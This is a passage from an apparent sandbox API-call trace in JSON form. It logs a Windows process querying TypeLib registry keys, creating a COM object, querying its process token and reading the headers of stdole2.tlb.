"P\\x8b\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\x7f\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\x087\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x86\\x03\\x00\\x00\\x00\\x00\\x00\\x000:\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00P\\x8c\\x7f\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1005 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64" } ], "repeated": 0, "id": 1006 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000386" }, { "name": "KeyInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "KeyInformationClass", "value": "7" } ], "repeated": 0, "id": 1007 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000388" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000386" }, { "name": "ObjectAttributesName", "value": "win64" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64" } ], "repeated": 0, "id": 1008 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000038a" }, { "name": "ValueName", "value": "" }, { "name": "Data", "value": "C:\\Windows\\System32\\wbem\\wbemdisp.TLB" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64\\(Default)" } ], "repeated": 0, "id": 1009 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000038a" } ], "repeated": 0, "id": 1010 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000386" } ], "repeated": 0, "id": 1011 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000382" } ], "repeated": 0, "id": 1012 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000037e" } ], "repeated": 0, "id": 1013 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000037a" } ], "repeated": 0, "id": 1014 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "00000346-0000-0000-C000-000000000046" }, { "name": "ClsContext", "value": "0x00000001", "pretty_value": "CLSCTX_INPROC_SERVER" }, { "name": "riid", "value": "E085AD58-B839-4625-B40B-4CC546E82D75" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 1015 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtOpenKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020119", "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|KEY_WOW64_64KEY|STANDARD_RIGHTS_REQUIRED" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\MACHINE\\Software\\Classes\\PackagedCom" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Classes\\PackagedCom" } ], "repeated": 0, "id": 1016 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x00000008" }, { "name": "TokenHandle", "value": "0x00000378" } ], "repeated": 0, "id": 1017 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "20" }, { "name": "TokenInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1018 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "18" }, { "name": "TokenInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1019 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x80\\x85\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\xf0'\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x12\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd8'\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x86\\x7f\\x00\\x00\\x00\\x00\\x00!\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1020 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000037c" }, { "name": "DesiredAccess", "value": "0x02000000", "pretty_value": "MAXIMUM_ALLOWED" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\User\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Classes" } ], "repeated": 0, "id": 1021 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000378" } ], "repeated": 0, "id": 1022 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x0000037e" }, { "name": "SubKey", "value": "TypeLib" }, { "name": "Handle", "value": "0x0000037a" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\Software\\Classes\\TypeLib" } ], "repeated": 0, "id": 1023 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000037e" } ], "repeated": 0, "id": 1024 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x0000037a" }, { "name": "SubKey", "value": "{00020430-0000-0000-C000-000000000046}" }, { "name": "Handle", "value": "0x0000037e" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}" } ], "repeated": 0, "id": 1025 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x0000037e" }, { "name": "SubKey", "value": "2.0" }, { "name": "Handle", "value": "0x00000382" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0" } ], "repeated": 0, "id": 1026 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000382" }, { "name": "SubKey", "value": "0" }, { "name": "Handle", "value": "0x00000386" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0\\0" } ], "repeated": 0, "id": 1027 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000386" }, { "name": "SubKey", "value": "win64" }, { "name": "Handle", "value": "0x0000038a" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0\\0\\win64" } ], "repeated": 0, "id": 1028 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000038a" } ], "repeated": 0, "id": 1029 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000386" } ], "repeated": 0, "id": 1030 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000382" }, { "name": "SubKey", "value": "0" }, { "name": "Handle", "value": "0x00000386" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0\\0" } ], "repeated": 0, "id": 1031 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000386" }, { "name": "KeyInformation", "value": "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0\\0" }, { "name": "KeyInformationClass", "value": "3" } ], "repeated": 0, "id": 1032 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000386" }, { "name": "KeyInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "KeyInformationClass", "value": "7" } ], "repeated": 0, "id": 1033 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x90~\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\x7f\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\x087\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x86\\x03\\x00\\x00\\x00\\x00\\x00\\x000:\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x90\\x7f\\x7f\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1034 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0\\0\\win64" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0\\0\\win64" } ], "repeated": 0, "id": 1035 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000386" }, { "name": "KeyInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "KeyInformationClass", "value": "7" } ], "repeated": 0, "id": 1036 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000388" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000386" }, { "name": "ObjectAttributesName", "value": "win64" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0\\0\\win64" } ], "repeated": 0, "id": 1037 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000038a" }, { "name": "ValueName", "value": "" }, { "name": "Data", "value": "C:\\Windows\\System32\\stdole2.tlb" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0\\0\\win64\\(Default)" } ], "repeated": 0, "id": 1038 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000038a" } ], "repeated": 0, "id": 1039 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000386" } ], "repeated": 0, "id": 1040 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000382" } ], "repeated": 0, "id": 1041 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000037e" } ], "repeated": 0, "id": 1042 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000037a" } ], "repeated": 0, "id": 1043 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000378" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\stdole2.tlb" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1044 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtQueryInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000378" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\stdole2.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 1, "id": 1045 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtReadFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000378" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\stdole2.tlb" }, { "name": "Buffer", "value": "MZ\\x90\\x00\\x03\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\xff\\xff\\x00\\x00\\xb8\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa8\\x00\\x00\\x00" }, { "name": "Length", "value": "64" } ], "repeated": 0, "id": 1046 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000378" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\stdole2.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1047 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000378" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\stdole2.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1048 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtReadFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000378" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\stdole2.tlb" }, { "name": "Buffer", "value": "PE\\x00\\x00" }, { "name": "Length", "value": "24" } ], "repeated": 0, "id": 1049 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtQueryInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000378" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\stdole2.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\xc0\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1050 }, { "timestamp": "2025-11-20 10:58:33,937", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000378" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\stdole2.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\xb0\\x01\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1051 }, { "timestamp": "2025-11-20 10:58:33,937", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtReadFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000378" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\stdole2.tlb" }, { "name": "Buffer", "value": ".rdata\\x00\\x00\\xb0\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\x00\\x00@" }, { "name": "Length", "value": "80" } ], "repeated": 0, "id": 1052 }, { "timestamp": "2025-11-20 10:58:33,937", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtQueryInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000378" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\stdole2.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 1, "id": 1053 }, { "timestamp": "2025-11-20 10:58:33,937", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000378" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\stdole2.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1054 }, { "timestamp": "2025-11-20 10:58:33,937", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtReadFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000378" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\stdole2.tlb" }, { "name": "Buffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x01\\x00" }, { "name": "Length", "value": "24" } ], "repeated": 0, "id": 1055 }, { "timestamp": "2025-11-20 10:58:33,937", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtQueryInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000378" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\stdole2.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\x18\\x04\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 1, "id": 1056 }, { "timestamp": "2025-11-20 10:58:33,937", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000378" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\stdole2.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\xf8\\x04\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1057 }, { "timestamp": "2025-11-20 10:58:33,937", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtReadFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000378" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\stdole2.tlb" }, { "name": "Buffer", "value": "\\x03\\x00" }, { "name": "Length", "value": "2" } ], "repeated": 0, "id": 1058 }, { "timestamp": "2025-11-20 10:58:33,937", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000378" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\stdole2.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\x18\\x04\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1059 }, { "timestamp": "2025-11-20 10:58:33,937", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtReadFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000378" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\stdole2.tlb" }, { "name": "Buffer", "value": "\\xe8\\x00\\x00\\x80@\\x00\\x00\\x80" }, { "name": "Length", "value": "8" } ], "repeated": 0, "id": 1060 }, { "timestamp": "2025-11-20 10:58:33,937", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtQueryInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000378" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\stdole2.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": " \\x04\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 1, "id": 1061 }, { "timestamp": "2025-11-20 10:58:33,937", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000378" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\stdole2.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": 